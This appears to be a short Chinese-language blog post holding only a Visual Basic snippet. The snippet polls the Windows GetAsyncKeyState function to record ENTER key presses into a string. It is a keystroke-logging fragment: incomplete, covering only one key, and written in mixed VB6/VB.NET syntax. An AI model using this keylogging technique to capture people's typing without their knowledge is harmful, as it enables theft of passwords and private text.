Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim AddKey, keyResult
Static KeyFound As String
keyResult = GetAsyncKeyState(13) 'ENTER
If keyResult = -32767 Then
AddKey = "[ENTER]"
KeyFound += AddKey.ToString
End If
訂閱:
張貼留言 (Atom)
沒有留言:
張貼留言